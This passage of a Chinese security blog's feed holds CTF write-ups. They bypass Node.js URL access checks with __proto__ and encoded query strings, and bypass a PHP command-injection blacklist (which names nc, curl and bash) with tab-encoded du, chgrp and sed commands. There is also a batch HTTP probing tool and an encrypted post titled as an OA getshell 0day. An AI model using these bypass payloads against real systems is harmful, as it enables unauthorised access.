class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'__proto__'</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'?='</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'&='</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getflag3</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> res.render(<span class="string">'flag'</span>, { <span class="attr">flag</span>: config.flag3, <span class="attr">code</span>: <span class="string">""</span> });</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = getflag3;</span><br></pre></td></tr></table></figure>
<p>getflag3 对url存在<code>__proto__</code> <code>?=</code> <code>&=</code>并匹配如果输入有<code>]*</code> 看是否等于<code>]=</code>进行了判断。这里采用将<code>[]</code>、<code>__proto__</code>进行url编码绕过。</p>
<p>本地环境调试</p>
<p><code>getflag3?&%5b%5d/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704132515104.png" alt="image-20210704132515104"></p>
<p><code>getflag3?%5f%5f%70%72%6f%74%6f%5f%5f=/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210713205833461.png" alt="image-20210713205833461"></p>
<figure class="highlight gcode"><table><tr><td class="code"><pre><span class="line">https:<span class="comment">//xxx.xxx.xxx.xxx.com/getflag3?&%5b%5d/login </span></span><br><span class="line"><span class="attr">#获取getflag3</span>的方法同样适用getfla<span class="name">g1</span>,getfla<span class="name">g2</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704132912877.png" alt="image-20210704132912877"></p>
<h4 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h4><p>仅供参考~</p>
]]></content>
</entry>
<entry>
<title>记又一次CTF拉练-Node.js</title>
<url>/2021/06/26/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>这篇文章记述了又一次的CTF拉练,Node.js的白盒审计题…</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h4><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">// 捕捉全局异常</span></span><br><span class="line">process.on(<span class="string">'uncaughtException'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">err</span>) </span>{</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">'Caught exception: '</span>, err);</span><br><span class="line">}); </span><br><span class="line"></span><br><span class="line"><span class="comment">////引入模块</span></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>) </span><br><span class="line"><span class="keyword">var</span> session = <span class="built_in">require</span>(<span class="string">'express-session'</span>);</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">'path'</span>);</span><br><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"><span class="keyword">var</span> marked = <span class="built_in">require</span>(<span class="string">'marked'</span>);</span><br><span class="line"><span class="keyword">var</span> morgan = <span class="built_in">require</span>(<span class="string">'morgan'</span>);</span><br><span class="line"><span class="keyword">var</span> bodyParser = <span class="built_in">require</span>(<span class="string">'body-parser'</span>);</span><br><span class="line"><span class="keyword">var</span> AccessControl = <span class="built_in">require</span>(<span class="string">'express-ip-access-control'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> port = process.env.PORT;</span><br><span class="line"><span class="keyword">var</span> app = express()</span><br><span class="line"><span class="keyword">var</span> sourceCode;</span><br><span class="line"></span><br><span class="line">marked.setOptions({</span><br><span class="line"> highlight: <span class="function"><span class="keyword">function</span> (<span class="params">code</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">require</span>(<span class="string">'highlight.js'</span>).highlightAuto(code).value</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="comment">// 系统文件读写操作</span></span><br><span class="line">fs.readFile(<span class="string">'app.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode = marked(markdown);</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> options = {</span><br><span class="line"> mode: <span class="string">'allow'</span>,</span><br><span class="line"> denys: [],</span><br><span class="line"> allows: [<span class="string">'10.0.0.6'</span>],</span><br><span class="line"> forceConnectionAddress: <span class="literal">false</span>,</span><br><span class="line"> log: <span class="function"><span class="keyword">function</span> (<span class="params">clientIp, access</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (!access)</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`<span class="subst">${clientIp}</span> denied.`</span>);</span><br><span class="line"> },</span><br><span class="line"> statusCode: <span class="number">404</span>,</span><br><span class="line"> redirectTo: <span class="string">''</span>,</span><br><span class="line"> message: <span class="string">'404 Not Found...Don\'t fuck me Please......'</span></span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="comment">// 访问控制'express-ip-access-control'</span></span><br><span class="line">app.use(AccessControl(options));</span><br><span class="line"><span class="comment">// 设置views文件夹,应用程序视图目录 ejs后缀</span></span><br><span class="line">app.set(<span class="string">'views'</span>, path.join(__dirname, <span class="string">'views'</span>));</span><br><span class="line">app.set(<span class="string">'view engine'</span>, <span class="string">'ejs'</span>);</span><br><span class="line"><span class="comment">//public下所有文件都会以静态资料文件形式返回(如样式、脚本、图片素材等文件)</span></span><br><span class="line">app.use(express.static(path.join(__dirname, <span class="string">'public'</span>)));</span><br><span class="line"></span><br><span class="line"><span class="comment">//session</span></span><br><span class="line">app.use(session({ <span class="attr">secret</span>: <span class="string">'ctf'</span>, <span class="attr">resave</span>: <span class="literal">true</span>, <span class="attr">saveUninitialized</span>: <span class="literal">true</span>, <span class="attr">name</span>: <span class="string">'SID'</span> }));</span><br><span class="line"></span><br><span class="line"><span class="comment">//morgan日志格式化 自定义format名ctf</span></span><br><span class="line">morgan.format(<span class="string">'ctf'</span>, <span class="string">'[ctf] [:remote-addr/:req[x-forwarded-for]] - ":method :url HTTP/:http-version" :status :res[content-length] ":referrer" ":user-agent"'</span>);</span><br><span class="line">app.use(morgan(<span class="string">'ctf'</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">//配置body-parser中间件 application/x-www-form-urlencoded,extended: true 任何数据类型 设置数据限制100mb 参数限制1000000</span></span><br><span class="line">app.use(bodyParser.urlencoded({ <span class="attr">limit</span>: <span class="string">'100mb'</span>, <span class="attr">extended</span>: <span class="literal">true</span>, <span class="attr">parameterLimit</span>: <span class="number">1000000</span> }));</span><br><span class="line"></span><br><span class="line"><span class="comment">// 网站根路径</span></span><br><span class="line">app.get(<span class="string">'/'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="comment">// console.log(sourceCode);</span></span><br><span class="line"> res.render(<span class="string">'index'</span>, {<span class="attr">code</span>: sourceCode});</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// 中间件处理</span></span><br><span class="line">app.use(<span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>{</span><br><span class="line"> <span class="comment">// 判断url中是否有/login 或者 session值是否未定义</span></span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query) && (<span class="keyword">typeof</span> req.session[<span class="string">'username'</span>] == <span class="string">'undefined'</span>)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> next();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 判断url是否存在有/login</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// login页面</span></span><br><span class="line">app.get(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> res.render(<span class="string">'login'</span>);</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// 登录post请求</span></span><br><span class="line">app.post(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> username = req.body[<span class="string">'username'</span>];</span><br><span class="line"> <span class="keyword">var</span> password = req.body[<span class="string">'password'</span>];</span><br><span class="line"> <span class="keyword">if</span> (username == config.username && password == config.password) {</span><br><span class="line"> req.session[<span class="string">"username"</span>] = <span class="string">"admin"</span>;</span><br><span class="line"> res.send(<span class="string">"login success."</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> res.send(<span class="string">'login failed.'</span>);</span><br><span class="line"> } </span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// getflag页面</span></span><br><span class="line">app.get(<span class="string">'/getflag'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="comment">// console.log(config);</span></span><br><span class="line"> res.render(<span class="string">'flag'</span>, {<span class="attr">flag</span>: config.flag}); <span class="comment">//加载flag</span></span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="comment">// 侦听</span></span><br><span class="line">app.listen(port, <span class="string">'0.0.0.0'</span>, () => {</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`ksctf app listening at http://0.0.0.0:<span class="subst">${port}</span>`</span>);</span><br><span class="line">})</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>思路解析</h4><p>首先分析代码, 先是引入一些模块,定义网站根路径加载源码,中间用isProtectUrl进行判断url中是否有/login及session[‘username’]是否定义来处理请求,不包含/login或者未定义seesion[‘username’]则跳转到网站根路径;定义了一个login页面,可以post验证用户名及密码,如果用户密码对了则session赋值;定义了一个getflag页面,该页面加载flag显示。</p>
<p>题目主要请求访问/getflag来查看flag文件。</p>
<h5 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>初步想法</h5><p>看是否有什么Cookie伪造之类的达到session赋值从而绕过typeof req.session[‘username’] == ‘undefined’)或者能否绕过isProtectUrl(req.originalUrl, req.query) 使两者中其中一个不成立后访问/getflag。</p>
<h5 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>本题考点</h5><p><strong>绕过isProtectUrl(url, query_url);</strong></p>
<p>req.query 一个对象,为每一个路由中的query string参数都分配一个属性。</p>
<p>1、不能获取原型链的属性</p>
<p>2、如果没有query string,它就是一个空对象,属性的值为{}。</p>
<p>3、不能获取数组[]后面=前面的值(如:<code>[]123</code>不能获取到123)</p>
<p>…</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><p>根据上述特性我们可以构造成<code>getflag?__proto__=/login</code>,<code>getflag?=/login</code>等等。</p>
<h5 id="本地环境调试"><a href="#本地环境调试" class="headerlink" title="本地环境调试"></a>本地环境调试</h5><p>1、<code>getflag?=/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node.js/image-20210626122959208.png" alt="image-20210626122959208"></p>
<p>2、<code>getflag?__proto__=/login</code></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node.js/image-20210626122805010.png" alt="image-20210626122805010"></p>
<h5 id="CTF环境"><a href="#CTF环境" class="headerlink" title="CTF环境"></a>CTF环境</h5><p>请求/getflag 获取flag</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">https:<span class="regexp">//</span>xxx.xxx.com<span class="regexp">/getflag?__proto__=/</span>login</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node.js/image-20210625214459295.png" alt="image-20210625214459295"></p>
<h4 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h4><p>仅供参考~</p>
]]></content>
</entry>
<entry>
<title>WEB批量请求器.md</title>
<url>/2021/06/17/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/</url>
<content><![CDATA[<p>本工具仅限技术研究与测试,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><p>WEB批量请求器(WebBatchRequest)是对目标地址批量进行快速的存活探测、Title获取,简单的banner识别,支持HTTP代理以及可自定义HTTP请求用于批量的漏洞验证等的一款基于JAVA编写的轻量工具。</p>
<a id="more"></a>
<h5 id="支持功能"><a href="#支持功能" class="headerlink" title="支持功能"></a>支持功能</h5><ul>
<li><input checked="" disabled="" type="checkbox"> 支持数据的导入、导出</li>
<li><input checked="" disabled="" type="checkbox"> GET、POST、HEAD请求</li>
<li><input checked="" disabled="" type="checkbox"> HTTP代理</li>
<li><input checked="" disabled="" type="checkbox"> 自定义Header</li>
<li><input checked="" disabled="" type="checkbox"> 自定义Cookies</li>
<li><input checked="" disabled="" type="checkbox"> 自定义User-Agent</li>
<li><input checked="" disabled="" type="checkbox"> 跟随302跳转</li>
<li><input checked="" disabled="" type="checkbox"> 进度条功能</li>
<li><input checked="" disabled="" type="checkbox"> 自定义线程数</li>
<li><input checked="" disabled="" type="checkbox"> 默认浏览器打开</li>
<li><input checked="" disabled="" type="checkbox"> 列表结果排序</li>
<li><input checked="" disabled="" type="checkbox"> 如果有什么建议需求可以在ISSUES提出来</li>
</ul>
<h4 id="效果"><a href="#效果" class="headerlink" title="效果"></a>效果</h4><p><img src="/img/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/image-20210613213901838.png" alt="image-20210613213901838"></p>
<p><img src="/img/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/image-20210613213932554.png" alt="image-20210613213932554"></p>
<p><img src="/img/web%E6%89%B9%E9%87%8F%E8%AF%B7%E6%B1%82%E5%99%A8/image-20210613214104266.png" alt="image-20210613214104266"></p>
<h4 id="项目地址"><a href="#项目地址" class="headerlink" title="项目地址"></a>项目地址</h4><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">https:<span class="regexp">//gi</span>thub.com<span class="regexp">/ScriptKid-Beta/</span>WebBatchRequest</span><br></pre></td></tr></table></figure>
<h4 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h4><p>欢迎师傅star,最重要的是如果师傅们有什么建议或者Bug,请在ISSUES里提出来~</p>
]]></content>
</entry>
<entry>
<title>记一次CTF拉练-命令执行绕过</title>
<url>/2021/05/20/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>这篇文章记述了一次CTF拉练的一道php的白盒审计题…</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); <span class="comment">//对文件进行语法高亮显示</span></span><br><span class="line">$filter = <span class="string">'/#|`| |[\x0a]|php|perl|dir|rm|ls|sleep|cut|sh|bash|grep|ash|nc|ping|curl|cat|tac|od|more|less|nl|vi|unique|head|tail|sort|rev|string|find|\$|\(\|\)|\[|\]|\{|\}|\>|\<|\?|\'|"|\*|;|\||&|\/|\\\\/is'</span>; <span class="comment">#定义黑名单</span></span><br><span class="line">$cmd = $_GET[<span class="string">'cmd'</span>]; <span class="comment"># get方式传递数据</span></span><br><span class="line"><span class="keyword">if</span>(!preg_match($filter, $cmd)){ <span class="comment"># 正则匹配并判断传递的数据</span></span><br><span class="line"> system($cmd.<span class="string">"echo 'okkkkkk'"</span>); <span class="comment">#执行外部程序,并显示输出</span></span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"ohhhhnnnoooooooooo....."</span>); <span class="comment">#输出一条消息,并退出当前脚本。</span></span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519155907178.png" alt="image-20210519155907178"></p>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>思路解析</h4><p>首先分析代码, 一开始先定义了一个<code>filter</code>过滤了一些bash命令等关键字(这里过滤了大多数常见的命令、符号等),定义了一个<code>$_GET变量</code>用于接收来自GET方法的数据,经过匹配<code>filter</code>后,如果没有相关关键字则将用户GET传的数据拼接<code>echo 'okkkkkk'</code>后执行<code>system()</code>函数,如果匹配到相关字眼就输出<code>ohhhhnnnoooooooooo.....</code>并退出,所以整道题的核心就是绕过<code>filter</code>。</p>
<h5 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>初步想法</h5><p>利用Linux其他相关可以查找、查看的命令再利用相关分隔符、拼接符等进行来绕过后面的拼接。</p>
<h5 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>本题考点</h5><p>① 空格绕过</p>
<p>② Linux其他相关可以列目录文件的命令</p>
<p>③ Linux其他相关可以查看文件的命令</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><h5 id="方式一"><a href="#方式一" class="headerlink" title="方式一"></a>方式一</h5><figure class="highlight sqf"><table><tr><td class="code"><pre><span class="line">① 利用 du -a 查看<span class="built_in">flag</span>文件名</span><br><span class="line">② 利用sed p 查看文件</span><br><span class="line">注: 需要用到%<span class="number">09</span>来绕过空格</span><br><span class="line"><span class="meta"># Linux du 命令可参考:https:<span class="comment">//www.runoob.com/linux/linux-comm-du.html</span></span></span><br></pre></td></tr></table></figure>
<p>本地模拟环境测试命令</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519175241095.png" alt="image-20210519175241095"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 查看当前目录文件名为this_is_real_real_flag_other_is_fake</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=du<span class="number">%09</span>-a<span class="number">%09</span>.<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519175502328.png" alt="image-20210519175502328"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 查看this_is_real_real_flag_other_is_fake内容</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=sed<span class="number">%09</span>p<span class="number">%09</span>this_is_real_real_flag_other_is_fake<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519162007917.png" alt="image-20210519162007917"></p>
<h5 id="方式二"><a href="#方式二" class="headerlink" title="方式二"></a>方式二</h5><figure class="highlight sqf"><table><tr><td class="code"><pre><span class="line">① 利用chgrp -v -R 查看<span class="built_in">flag</span>文件名</span><br><span class="line">② 利用sed p 查看文件</span><br><span class="line">注: 需要用到%<span class="number">09</span>来绕过空格</span><br><span class="line"><span class="meta"># Linux chgrp 命令可参考:https:<span class="comment">//www.runoob.com/linux/linux-comm-chgrp.html</span></span></span><br></pre></td></tr></table></figure>
<p>本地模拟环境测试命令</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519175429396.png" alt="image-20210519175429396"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 查看当前目录文件名为this_is_real_real_flag_other_is_fake</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=chgrp<span class="number">%09</span>-v<span class="number">%09</span>-R<span class="number">%09</span>root<span class="number">%09</span>.<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<h5 id=""><a href="#" class="headerlink" title=""></a><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519161927450.png" alt="image-20210519161927450"></h5><figure class="highlight apache"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 查看this_is_real_real_flag_other_is_fake内容</span></span><br><span class="line"><span class="attribute">https</span>://xxx.xxx.com/?cmd=sed<span class="number">%09</span>p<span class="number">%09</span>this_is_real_real_flag_other_is_fake<span class="number">%09</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/image-20210519162007917.png" alt="image-20210519162007917"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.runoob.com/linux/linux-comm-du.html" target="_blank" rel="noopener">https://www.runoob.com/linux/linux-comm-du.html</a></p>
<p><a href="https://www.runoob.com/linux/linux-comm-chgrp.html" target="_blank" rel="noopener">https://www.runoob.com/linux/linux-comm-chgrp.html</a></p>
]]></content>
<tags>
<tag>CTF</tag>
</tags>
</entry>
<entry>
<title>蓝凌OA Getshell 0day</title>
<url>/2021/04/25/%E8%93%9D%E5%87%8COA_0day/</url>
<content><![CDATA[<div id="hexo-blog-encrypt" data-wpm="密码不正确,请重新输入!" data-whm="文章不能被校验, 不过您还是能看看解密后的内容!">
<div class="hbe-input-container">
<input type="password" id="hbePass" placeholder="" />
<label for="hbePass">该文章已受密码保护, 请您输入密码查看。</label>
<div class="bottom-line"></div>
</div>
<script id="hbeData" type="hbeData" data-hmacdigest="d889eb0e3a3aed84d1e784b361541533ea42839bbb3e72f2fe6dc8c0ff524e9e">9eeabe894e24803cb843afe190430eaad552d9484b5c6d155de8f226e1aa35bbd91deb0b975c3988ba830c60587c5c7db1957fd436d29db46d3afe49d43c09db21daada7e20ef15ba17d93e434b50be01c895acf594691760c4804094db959740d6af7d11f77da21bdc3dce9690f187234f5f49d90483c12ae2852b4ab7132e328f5b047626ffffe69ecc4c0aaf7a12de05a84545a661b6c4d95ec2f41482723c662c64df090a949b1853f5b9c7396c0de79408e3d05c0def167c0337aa143e3ea756a2aac84fa879a65acb268802edc1853a226ed41756bdf79935129808814ac8351467127256e0fd281704efa8d85066fdcdc7fd63585ad304c9027a347495120e7c87be425e2bf5820c01cb5bd9a4e96fc84f223916739631a8a8ba36b73578383c8726cb8f273aac4474455bdeb2b08a1e8a0058096c2eeb4f189ac3737be51343607792c66ab86eb8ce3e24f89bfd1e3bd111cdf5e4130e82bdc21772db6a0ee8b36839b633cd2d2aefe3077e4211507eb825143a4284c3827326b2cb0bc0d986d284370bce1ceef671ca0e9e7fad02d85adfdbda52bee7078c04c0ef609d9265d1dc547a11f23933f97b980a18c29aef43e7bf9da7ebe802058e6b4409c3ea16c709b8329c0386cab8660473018367068189f67fd33a58d1a82bd52e8245877ea32d517d014fff541c76de9c271656d5c683ca8d3985ddb00c5c021cb769e6a84a0c08b7757fb8a1266c2e3b6f197109c07dd24129c1da2c50e9a1cb7fb2337a957f3a3e05cd485f94e64e1910c9a747d9df792933195831ab5a1a38dff3fcfd656238a190bbe6d804f67357e62b014c0a1dded6a89e468aa6fe7f10b2257f1b6406822746580c33b4b3e97085c656ef03c1a187d2691b1c7cad1d17346c45ee701d8b87c770e3aed300ec085daf88ae36d0397e09ec4bb04e3fd8a794891cb041114426589560f93061764329ee15e09f7f7e21a9ba8219df669a7448a3ee9fcb405612b4c7002a59e84fe2d38f51b41a8cf5bbc3a4615d8ce1650f83cc3c875ed4bb97997f5d9aea258852383128a3b305df867b37dde00843e02332403f6f79a3efa4ca0d8fc6de5afa9a32a13975198f041e7c0a056e3b1bba654807deecc89538c7f701e338345500ccc571f18a57a66bd789cf358b4495541e805440cbe6fe7a6d57db6b6e7927f5a7a84be8fa2ad871c9a26893df9f3079236ffcc78b8d0028b2f482655c4ab36d589899bf55ea3cea67161dd17e614432559b30b23ed4251d8285d8f354264d41081d6eeafe32c51eea3b394c2ec6fa58a193e96a3bc261264a72f3b8e8abec28728a48334359ac1013f57fbdacf7b2010f448dc780792b2452bde938d999eb63f20a422ed1ec09e7744a68c47ba55d895a94b91e2e90f08f95ec0c9dc1ef52fbcdc3de98eaebeb1d118c8b4eaec66bb61adbb49af2811bfe12885b44807b6eed13ddd68e8472f3e2e780ad33fa1212e7eaf248796d1617dc9edd211ee9f48543aca316f3ca0a57a04433cca47416c20af7bf0752531bafa63200bdda5014f24e1b2bc9d80d4a8723e0091a96396449e90472cd4630ee4dba08af910c974c386a5b96d0199fbd30518509dd376e7c217b0510568400a9187eb2bf15e89942ca41d16b985029f358750c6ed5029137c3e2822886ffbe0c09d2d65bca93e8a5e2d0c54262bb8ff61949dc89abd8ea810390497d1b84959f001bc17d3c124537e95e18c8476de1e879200931da0924a86a67547489e87453632b300d949de271dc3ea686660438aaaecfffef0dc91b13fa2a024e366afb7ced6714e8ae8db27bdb98dc2adbd54442f5b9ffd43a26b40d14f8b8708ab9aaa9b338bd0a481496c2f2497912210fe239c4d18d6fc0a0525cd7c9e95fc06a38a9ae96515d58e59eb262bd4414aa66d0b0207c659af1f332e676ae29106c3f2999fe56dc77403a209b460b571de7039bf0603d4f2835875bcc5a68e71d6073e61c13a435c30176e564524251d83c8d6808c0a865d0c5b840e5b47eb67ba009e8fa3000399bb65fed56f590ab38cd6f030e23aa982268c9c8761474e24c2ceab249ca2015d6b5950f88cb3c6925ca0e7af9720b4c43cf2b3f43f598734e39bdf9c6478f4a2ae2938fa23b48cd913669fe0f2ad9019ad614b363cd7002f9326b4504ef42d11424bac3d5b7ff081044f02f6b07a463c6f7dd697e6a72170394c3a7cceae4b58d335133aaa0a9638b13047b9f33230feb0d586eeb10022b8c37a0d2454bfd52eb71a9c580767cc445cbe5ff38dc92958838a46acaf6408dedf87f6b2a5bbc3f4bafd88e5fa4ac2bbe907dc9798685df1b6afb1021365fff93ba4eeb0ff5ffc381ea93b60329d586c31f03c58c3658dee25c1c43